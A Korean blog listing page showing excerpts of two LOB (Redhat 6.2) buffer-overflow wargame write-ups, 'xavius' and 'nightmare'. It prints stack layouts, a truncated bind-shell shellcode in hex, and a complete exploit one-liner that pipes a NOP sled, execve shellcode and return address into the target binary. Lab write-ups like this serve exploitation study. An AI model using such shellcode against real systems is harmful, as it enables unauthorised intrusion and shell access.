2015년 11월 09일 월요일 보호되어 있는 글입니다. 더보기 LOB Redhat 6.2 - xavius xavius - Remote BOFStack : sin_size[4] + client_addr[16] + server_addr[16] + client_id[4] + server_id[4] + buffer[40] + sfp[4] + ret[4]bind shellcode : \x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\x.. 더보기 LOB Redhat 6.2 - nightmare nightmare - argStack : *ret_addr[4] + buffer[40] + sfp[4] + ret[4]read's temporary buffer : 0x40015000Payload : (python -c 'print "\x90"*21 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x10\x50\x01\x40"';cat)|./xavius Using fgets temporary buffer 더보기 이전 1 ··· 56 57 58 59 60 61 62 ··· 75 다음